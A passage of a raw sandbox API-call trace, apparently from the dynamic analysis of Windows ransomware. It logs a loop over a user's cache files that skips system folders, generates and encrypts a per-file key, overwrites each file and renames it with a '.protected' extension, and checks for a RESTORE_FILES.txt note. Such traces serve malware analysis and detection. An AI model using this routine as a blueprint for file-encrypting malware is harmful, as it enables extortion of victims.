"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.protected")) returned 1 [0088.996] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Windows") returned -1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Program Files") returned -1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Program Files (x86)") returned -1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="$Recycle.bin") returned 1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="System Volume Information") returned -1 [0088.996] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 119 [0088.996] StrStrIW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".protected") returned 0x0 [0088.996] lstrcmpW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="RESTORE_FILES.txt") returned -1 [0088.996] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.996] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.006] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 119 [0089.006] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".txt") returned 0x0 [0089.006] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 119 [0089.006] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".rar") returned 0x0 [0089.006] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 119 [0089.006] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".zip") returned 0x0 [0089.007] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x100, lpOverlapped=0x0) returned 1 [0089.007] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.007] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x100, lpOverlapped=0x0) returned 1 [0089.008] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.008] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.008] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.008] CloseHandle (hObject=0x150) returned 1 [0089.008] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.protected") returned 129 [0089.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21.protected")) returned 1 [0089.009] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Windows") returned -1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Program Files") returned -1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Program Files (x86)") returned -1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="$Recycle.bin") returned 1 [0089.009] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="System Volume Information") returned -1 [0089.009] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 152 [0089.009] StrStrIW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".protected") returned 0x0 [0089.009] lstrcmpW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="RESTORE_FILES.txt") returned -1 [0089.009] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.009] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 152 [0089.010] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".txt") returned 0x0 [0089.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 152 [0089.010] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".rar") returned 0x0 [0089.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 152 [0089.010] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".zip") returned 0x0 [0089.010] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1b2, lpOverlapped=0x0) returned 1 [0089.011] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.011] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1b2, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1b2, lpOverlapped=0x0) returned 1 [0089.011] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.011] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.011] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.011] CloseHandle (hObject=0x150) returned 1 [0089.012] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.protected") returned 162 [0089.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.protected")) returned 1 [0089.013] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Windows") returned -1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files") returned -1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files (x86)") returned -1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="$Recycle.bin") returned 1 [0089.013] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="System Volume Information") returned -1 [0089.013] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 119 [0089.013] StrStrIW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".protected") returned 0x0 [0089.013] lstrcmpW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="RESTORE_FILES.txt") returned -1 [0089.013] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.013] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 119 [0089.013] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0089.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 119 [0089.014] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".rar") returned 0x0 [0089.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 119 [0089.014] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".zip") returned 0x0 [0089.014] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xdc, lpOverlapped=0x0) returned 1 [0089.014] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.014] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xdc, lpOverlapped=0x0) returned 1 [0089.015] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.015] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.015] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.015] CloseHandle (hObject=0x150) returned 1 [0089.015] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected") returned 129 [0089.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.protected")) returned 1 [0089.016] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.016] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Windows") returned -1 [0089.016] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Program Files") returned -1 [0089.016] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Program Files (x86)") returned -1 [0089.016] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="$Recycle.bin") returned 1 [0089.016] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="System Volume Information") returned -1 [0089.016] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 152 [0089.016] StrStrIW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".protected") returned 0x0 [0089.016] lstrcmpW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="RESTORE_FILES.txt") returned -1 [0089.016] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.016] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.017] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 152 [0089.017] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".txt") returned 0x0 [0089.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 152 [0089.018] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".rar") returned 0x0 [0089.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 152 [0089.018] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".zip") returned 0x0 [0089.018] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.018] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.019] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.019] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.019] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.019] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.019] CloseHandle (hObject=0x150) returned 1 [0089.019] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.protected") returned 162 [0089.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.protected")) returned 1 [0089.020] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.020] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Windows") returned -1 [0089.020] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Program Files") returned -1 [0089.020] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Program Files (x86)") returned -1 [0089.020] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="$Recycle.bin") returned 1 [0089.020] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="System Volume Information") returned -1 [0089.020] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 152 [0089.020] StrStrIW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".protected") returned 0x0 [0089.020] lstrcmpW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="RESTORE_FILES.txt") returned -1 [0089.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 